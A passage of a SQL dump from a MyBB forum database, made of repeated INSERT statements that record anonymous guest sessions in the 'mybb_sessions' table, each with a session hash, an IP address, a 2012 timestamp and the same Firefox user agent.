WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b66c1e01f98e49f3608d61e319494f25', '0', '172.58.209.239', '1352771631', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('58361e9f2dbdf3f817bcc48e760eecf8', '0', '119.188.77.35', '1352771631', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('18a26f2d50d34e7f0868dadc02140162', '0', '196.81.184.117', '1352771632', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e6852d45df88823220271e50aa7d2a01', '0', '136.28.173.43', '1352771633', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c1433d6f14588eb2d6cb8fff2beb6e16', '0', '246.109.183.164', '1352771633', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('56072f51dbe75c3ea26ec9d3d47db28d', '0', '47.67.236.40', '1352771634', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('033bac7e97b5cd44736f2605eb83bb46', '0', '238.137.30.49', '1352771639', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8a13b08dc0234b670b8b6bb8a472a1f8', '0', '57.229.127.15', '1352771644', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b2e64feaf714f6df44a4362f02c7c653', '0', '64.70.72.247', '1352771645', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c0b61644afd82f2cce376bce47a54e63', '0', '141.28.92.90', '1352771645', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('674fc932dff6f3ce1fa8a212e5e490c5', '0', '179.206.250.36', '1352771647', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('02e0939809954e86f00c9e659a311b98', '0', '98.241.147.117', '1352771649', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('990e04df9a727f73906fd1f5afb03462', '0', '146.194.0.175', '1352771649', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('576c685e762602478017fe166957202f', '0', '183.135.8.37', '1352771651', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('16899112ec7e75d10637caf82d95a3ee', '0', '48.89.9.88', '1352771652', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('12f35c80f37a6294e9444becb5aec1a6', '0', '132.187.165.153', '1352771653', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b4ad7164a2ab92a58677c3ac7e701e13', '0', '21.173.167.100', '1352771653', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2d0a35c6d377b7b4e6609e521bd09794', '0', '221.81.184.132', '1352771654', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e212db2ba4a613635961a98c698123ca', '0', '110.149.231.48', '1352771655', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2f2fe1f1e44b5f4889a13488b7accb96', '0', '232.60.66.35', '1352771655', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a4c3459314bf8caa0b861af36511551b', '0', '242.89.51.158', '1352771656', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('832271fd0ca70de48424aaa60cb24d9a', '0', '128.152.13.24', '1352771657', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b9134d4431ffc93bc061a61a99392717', '0', '223.139.81.147', '1352771657', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('59803f679aead3617301646ef68d3c2f', '0', '81.63.225.193', '1352771658', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0b8a71bd4b34a25b18caad2efd7b7ffc', '0', '110.215.222.63', '1352771660', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d47e9f74698720dbaebf9925a4a7fd13', '0', '31.37.212.111', '1352771660', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('31d298c28b774950ff89f8c016b21f07', '0', '63.37.31.79', '1352771663', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('55e6929c8f12cbece04f9cfef7a0d4dd', '0', '87.136.236.87', '1352771665', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('298bea16003572f0ac08f61d48700ec5', '0', '125.178.171.69', '1352771671', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e0cae412ce26b633492d9aa64822e6f2', '0', '206.89.62.194', '1352771673', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c84c00c6074420d8015e3419c9b5cf0e', '0', '138.176.47.131', '1352771676', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3890eedb03a2291f6c664fdc43029be4', '0', '180.61.243.38', '1352771677', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a38612c94faeda48dad36d8a481f64c3', '0', '184.251.132.5', '1352771678', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('510b9af0ca22a2fc3be7d6a43ec8ae4a', '0', '230.117.229.14', '1352771679', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e10f40cfb373913f2ac1d9d1c16768d5', '0', '152.196.246.54', '1352771679', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ebb60c9aa366408f968d0598c5d90e9e', '0', '43.251.110.245', '1352771680', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fdcca65dd6ff5e8eedaeb582f64101ae', '0', '179.74.173.138', '1352771681', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5ad6b7738bd224e5689c98b6dae4c8f8', '0', '180.70.54.117', '1352771683', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2b406f3b5f775203ed019477b3f8bbfd', '0', '219.129.143.174', '1352771684', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('63c3d69b89fbf7b1e3ceb1fe71e84783', '0', '31.244.111.107', '1352771685', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f49cb2ce12c7158bdc3c9022575bec10', '0', '18.250.125.160', '1352771686', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a146301eefbcf9d1139d8b65641a791b', '0', '190.236.56.68', '1352771686', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('36d3093c714d0b674210d68e6ced6b54', '0', '215.165.136.153', '1352771687', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b3f77bb10815201620814fe2ba8e29be', '0', '209.176.26.153', '1352771692', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f73db3477a8e1454ad6b6ad01bd8c795', '0', '207.75.81.21', '1352771694', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4ef2334d464384f3a2a4ef2ff9c67a65', '0', '213.98.106.29', '1352771695', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('07429fef8760c660e94c6c6de1f3c893', '0', '110.67.66.85', '1352771695', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('24e82fc53a98a349d3d675fc72620d27', '0', '76.141.133.35', '1352771696', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a64ab23e457feef95ffb38f0240c97ed', '0', '135.35.44.200', '1352771697', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1b2b214b5dc9f6c0d069eef7b9b1350f', '0', '167.219.26.255', '1352771698', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f3999452d8327e3c1f308e052728fca6', '0', '118.111.206.34', '1352771699', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c5700bb884d7fef03327dfcff1d23ca1', '0', '203.106.32.107', '1352771700', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1a9b240d370c73e2a9be48187ca0ee1d', '0', '116.23.144.2', '1352771703', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a963cd865f0023c1dd1a344d8c382505', '0', '148.74.36.209', '1352771704', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3f21f1eef99a475f135eadce87cc9c42', '0', '46.224.56.95', '1352771705', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3d7f28759ec960f3e9f1d5ad1d099855', '0', '104.66.37.66', '1352771705', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('49a4968cd9d875255c15a9f30e8f6634', '0', '189.12.91.208', '1352771706', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f1a5382e7803005b994b892c8d713374', '0', '24.14.78.116', '1352771709', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('698ac025362c974cfb71b695f8156b87', '0', '62.7.247.123', '1352771712', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8ffce10a97f8dbd7e2adaed7130915b4', '0', '105.106.235.166', '1352771713', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d06c21fe6a29cea9f2f797685c50b015', '0', '198.39.208.128', '1352771713', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('98d0aea457e07bf2f2720765a407c36b', '0', '77.135.179.17', '1352771715', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('71964d0c3ef7094a1453c9b7e615a640', '0', '225.17.231.88', '1352771716', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('964fd43f43c445c83e3d6ccad18a2c34', '0', '114.100.213.84', '1352771738', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0f809fc5dca3acbe17c8422f6c96bd58', '0', '184.196.105.154', '1352771717', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('386d03f0d30ca38b5e863f4c2aff5f54', '0', '178.236.169.184', '1352771717', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c2ce3e02ba1f2a289b2d937b4fde49b9', '0', '66.146.79.198', '1352771718', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1a545c4040f4ac24537929393f9113dc', '0', '115.35.216.232', '1352771719', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d50cb76ffb6cbaad4286ad33465a8b49', '0', '24.54.11.16', '1352771722', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3160a19cd36b2e18fc11285f9ae96008', '0', '225.55.22.118', '1352771723', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('20e6bfb21736dbc9407567a806c3c0e1', '0', '191.4.92.115', '1352771723', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c7cdd390ed80ed66cb9319b47f9756f4', '0', '143.9.68.151', '1352771724', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('03496f26fcd51b7584a055ffd7f16ea5', '0', '95.105.241.52', '1352771725', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c314e5a3b92574739ce815fc6513fd29', '0', '93.21.121.128', '1352771729', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('232cefc812052675186204380492920e', '0', '239.238.119.254', '1352771731', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('25ab95016b4cd85610b2e58cf1034dd1', '0', '195.10.5.71', '1352771734', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('df4f6ec5272c2ed813623cc5ec6f3b08', '0', '99.77.107.122', '1352771736', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('aa9e39c70d07af684008724cdac3d03a', '0', '148.250.208.205', '1352771736', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2db1a45da8d2629d9207055d8fba7105', '0', '210.69.190.142', '1352771737', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT 